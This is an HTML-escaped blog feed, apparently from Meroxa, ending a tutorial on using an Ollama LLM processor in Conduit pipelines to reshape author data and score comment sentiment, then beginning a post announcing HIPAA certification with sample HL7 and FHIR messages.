  &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Charles    &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Dickens     &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1812&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Oliver Twist
  &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Jane       &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Austin      &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1775&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Pride &lt;span class=&quot;token operator&quot;&gt;and&lt;/span&gt; Prejudice
  &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Charlotte  &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Bronté      &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1816&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Jane Eyre
  &lt;span class=&quot;token number&quot;&gt;4&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Edgar      &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Allan Poe   &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1809&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; The Raven
  &lt;span class=&quot;token number&quot;&gt;5&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Jane       &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Austen      &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1815&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Pride &lt;span class=&quot;token operator&quot;&gt;and&lt;/span&gt; Prejudice
  &lt;span class=&quot;token number&quot;&gt;6&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Sylvia     &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Plath       &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1932&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; The Bell Jar
  &lt;span class=&quot;token number&quot;&gt;7&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Sir Arthur &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Conan Doyle &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1859&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; The Adventures &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; Sherlock Holmes
  &lt;span class=&quot;token number&quot;&gt;8&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Ray        &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Bradbury    &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1920&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Fahrenheit &lt;span class=&quot;token number&quot;&gt;451&lt;/span&gt;
  &lt;span class=&quot;token number&quot;&gt;9&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; L          &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Frank Baum  &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1856&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Wizard &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; Oz
 &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; charles    &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; darwin      &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          &lt;span class=&quot;token number&quot;&gt;1809&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Origin &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; Species&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This example shows how the Ollama processor transformed the data according to the requirements specified in our prompt. The processor successfully:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Split the full name into first and last name components&lt;/li&gt;
&lt;li&gt;Calculated the year of birth based on the provided age&lt;/li&gt;
&lt;li&gt;Maintained the original book information&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can see that the data has mostly been properly restructured to match the new schema; however, the model has made a few choices that are not desired (like adding a &lt;em&gt;Sir&lt;/em&gt; to Arthur Conan Doyle, and replacing Gabriel Garcia Marquez with a duplicate Jane Austen row), so I will need to edit my prompt accordingly.&lt;/p&gt;
&lt;h3&gt;AI Sentiment Analysis&lt;/h3&gt;
&lt;p&gt;In this example, I run a cooking blog and have just released a new cooking video. I am parsing various comments to determine feedback that I can act on for my next video.&lt;/p&gt;
&lt;p&gt;I need to ask the model to copy the comment to my new table, extract any appropriate feedback, and give a sentiment analysis of the comment.&lt;/p&gt;
&lt;p&gt;This is my sample Conduit pipeline configuration.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.2&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ollama&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;feedback
  &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
  &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;connector&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
      &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;postgres
      &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;tables&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;blog_comment&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres://username:password@localhost:5433/client1?sslmode=disable&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; dest&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;connector&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
      &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;postgres
      &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres://username:password@localhost:5433/client2?sslmode=disable&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;table&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;feedback&quot;&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ollama&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;processor&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;ollama
      &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;http://127.0.0.1:11434&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;model&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;llama3.2&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;prompt&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token scalar string&quot;&gt;
          Take the given input, and put the information into the following format:
          {
            &quot;raw_content&quot;: &quot;something&quot;,
            &quot;feedback&quot;: &quot;something&quot;,
            &quot;sentiment&quot;: &quot;negative&quot;
          }
          The raw_content field should be filled with the information from &quot;content&quot; in the form of a string.
          The feedback field should contain a string of any information said in the content field that is
          something that could be done to improve.
          The sentiment field should be a string of either positive, negative, or neutral.&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;After I have run the pipeline, the state of my data is shown below.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt; id &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;    name    &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;                              content                              &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;       creation_date
&lt;span class=&quot;token comment&quot;&gt;----+------------+-------------------------------------------------------------------+----------------------------&lt;/span&gt;
  &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; username01 &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; This was so helpful&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt; Thanks&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;                                     &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2025&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;03&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;28&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;12&lt;/span&gt;:&lt;span class=&quot;token number&quot;&gt;29&lt;/span&gt;:&lt;span class=&quot;token number&quot;&gt;08.957372&lt;/span&gt;
  &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; username02 &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; I hated that&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt; Should have been &lt;span class=&quot;token number&quot;&gt;6&lt;/span&gt; min shorter                      &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2025&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;03&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;28&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;12&lt;/span&gt;:&lt;span class=&quot;token number&quot;&gt;29&lt;/span&gt;:&lt;span class=&quot;token number&quot;&gt;08.957372&lt;/span&gt;
  &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; username03 &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Good video&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt; Adding &lt;span class=&quot;token keyword&quot;&gt;some&lt;/span&gt; ginger &lt;span class=&quot;token keyword&quot;&gt;to&lt;/span&gt; the recipe would make it better &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2025&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;03&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;28&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;12&lt;/span&gt;:&lt;span class=&quot;token number&quot;&gt;29&lt;/span&gt;:&lt;span class=&quot;token number&quot;&gt;08.957372&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt; id &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;                            raw_content                            &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;             feedback             &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; sentiment
&lt;span class=&quot;token comment&quot;&gt;----+-------------------------------------------------------------------+----------------------------------+-----------&lt;/span&gt;
  &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; This was so helpful&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt; Thanks&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;                                     &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;                                  &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; positive
  &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; I hated that&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt; Should have been &lt;span class=&quot;token number&quot;&gt;6&lt;/span&gt; min shorter                      &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Should have been &lt;span class=&quot;token number&quot;&gt;6&lt;/span&gt; min shorter   &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; negative
  &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Good video&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt; Adding &lt;span class=&quot;token keyword&quot;&gt;some&lt;/span&gt; ginger &lt;span class=&quot;token keyword&quot;&gt;to&lt;/span&gt; the recipe would make it better &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Adding &lt;span class=&quot;token keyword&quot;&gt;some&lt;/span&gt; ginger &lt;span class=&quot;token keyword&quot;&gt;to&lt;/span&gt; the recipe &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; positive&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here we can see the processor successfully:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;copied the &lt;code class=&quot;language-text&quot;&gt;content&lt;/code&gt; column from the original table into &lt;code class=&quot;language-text&quot;&gt;raw_content&lt;/code&gt; in our new &lt;code class=&quot;language-text&quot;&gt;feedback&lt;/code&gt; table&lt;/li&gt;
&lt;li&gt;extracted any feedback from the original comment&lt;/li&gt;
&lt;li&gt;determined whether each comment&apos;s sentiment is positive, negative, or neutral&lt;/li&gt;
&lt;/ul&gt;
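&lt;p&gt;For reference, a destination table along these lines would hold the processor&apos;s output. The exact DDL isn&apos;t shown in this example, so the column names and types below are an assumption based on the results above:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;-- Hypothetical schema for the destination table
CREATE TABLE feedback (
  id          SERIAL PRIMARY KEY,
  raw_content TEXT NOT NULL, -- verbatim copy of the original comment
  feedback    TEXT,          -- actionable feedback extracted by the model
  sentiment   TEXT           -- &apos;positive&apos;, &apos;negative&apos;, or &apos;neutral&apos;
);&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;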
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The Ollama processor opens up a variety of new possibilities for data processing. Whether you are cleaning, enriching, or analyzing data, your Conduit pipelines now have new ways to interact with your data.&lt;/p&gt;
&lt;p&gt;Please try out the new Ollama processor for your own use cases, and let us know your results by joining our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; server.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time Healthcare, Without the Wait: Meroxa is Now HIPAA Certified]]></title><description><![CDATA[Meroxa is now HIPAA certified, offering real-time HL7 and FHIR data streaming to modernize healthcare workflows, boost compliance, and power AI.]]></description><link>https://meroxa.com/blog/real-time-healthcare-without-the-wait-meroxa-is-now-hipaa-certified</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-healthcare-without-the-wait-meroxa-is-now-hipaa-certified</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Wed, 04 Jun 2025 09:32:00 GMT</pubDate><content:encoded>&lt;p&gt;Healthcare shouldn’t have a lag time.&lt;/p&gt;
&lt;p&gt;But across hospitals, clinics, and digital health platforms, data still moves like it’s 2004—slow, siloed, and stuck in outdated workflows. A patient is admitted, but the specialist won’t see the file for days. A lab result is finalized, but no system knows what to do with it.&lt;/p&gt;
&lt;p&gt;That changes now.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa is officially HIPAA certified&lt;/strong&gt;, and we’ve built native processors for &lt;strong&gt;HL7 and FHIR&lt;/strong&gt;—the dominant healthcare data formats. That means you can stream, transform, and act on clinical data the moment it’s created.&lt;/p&gt;
&lt;p&gt;No more waiting. No more manual handoffs. Just secure, real-time healthcare infrastructure that works.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;🧬 The Real World Still Runs on HL7&lt;/h2&gt;
&lt;p&gt;HL7 v2 is the backbone of U.S. healthcare data. It powers:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ADT (Admission/Discharge/Transfer) events&lt;/li&gt;
&lt;li&gt;Lab results&lt;/li&gt;
&lt;li&gt;Pharmacy orders&lt;/li&gt;
&lt;li&gt;Billing workflows&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;But developers know the struggle: pipe-delimited fields, cryptic segment codes, and brittle custom integrations.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;MSH&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;^~&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;LABHOST&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;LAB&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;CIS&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;CIS&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;202402041030&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt;ORU^R01&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;12345&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;P&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;2.3&lt;/span&gt;
PID&lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;PATID1234^5^M11&lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt;JONES^WILLIAM^A^III&lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;19610615&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;M
OBR&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;8642753100012&lt;/span&gt;^LIS&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;20809880170&lt;/span&gt;^EHR&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;93000&lt;/span&gt;^ECHOCARDIOGRAM^^93000
OBX&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;ST&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;93000&lt;/span&gt;^ECHOCARDIOGRAM&lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt;NORMAL&lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;N&lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt;F&lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;202402041025&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It’s powerful, yes—but it wasn’t built for real-time AI or modern APIs.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;⚡ Enter FHIR—and Meroxa&lt;/h2&gt;
&lt;p&gt;FHIR (Fast Healthcare Interoperability Resources) adoption is accelerating, with global regulatory backing and growing uptake among health tech companies. It’s modern, flexible, and machine-readable, as seen below:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;json&quot;&gt;&lt;pre class=&quot;language-json&quot;&gt;&lt;code class=&quot;language-json&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;resourceType&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Patient&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;identifier&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;system&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;urn:oid:1.2.36.146.595.217.0.1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;value&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;12345&quot;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;family&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Smith&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;given&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;John&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;But HL7 isn’t going away anytime soon.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa’s Conduit platform handles both&lt;/strong&gt;, streaming HL7 v2 or FHIR in real time, with automatic bidirectional translation between the two formats.&lt;/p&gt;
&lt;p&gt;Your systems speak different languages. We make them fluent.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;📉 From 5 Days to 10 Seconds&lt;/h2&gt;
&lt;p&gt;A US-based national healthcare provider came to us with a familiar challenge: HL7 files dropped onto an SFTP server, sent in batches, processed by custom scripts. On average, it took &lt;strong&gt;2–5 days&lt;/strong&gt; to get data into their downstream systems.&lt;/p&gt;
&lt;p&gt;With Meroxa, we replaced all of it with a real-time pipeline:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;HL7 messages were detected instantly&lt;/li&gt;
&lt;li&gt;Transformed to FHIR on the fly&lt;/li&gt;
&lt;li&gt;Synced to PostgreSQL, Oracle, and Databricks—in seconds&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;No new infrastructure. No code rewrites. Just faster, better care delivery.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;🔄 Under the Hood&lt;/h2&gt;
&lt;p&gt;Meroxa + Conduit gives you:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Live HL7↔FHIR conversion&lt;/strong&gt; via a single processor&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Low-code pipeline builder&lt;/strong&gt; with YAML support for custom workflows&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Exactly-once delivery&lt;/strong&gt;, with built-in dead-letter queues&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloud-agnostic deployment&lt;/strong&gt; (AWS, Azure, GCP)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Streaming + batch support&lt;/strong&gt;, scaled to 70,000+ msgs/sec&lt;/li&gt;
&lt;/ul&gt;
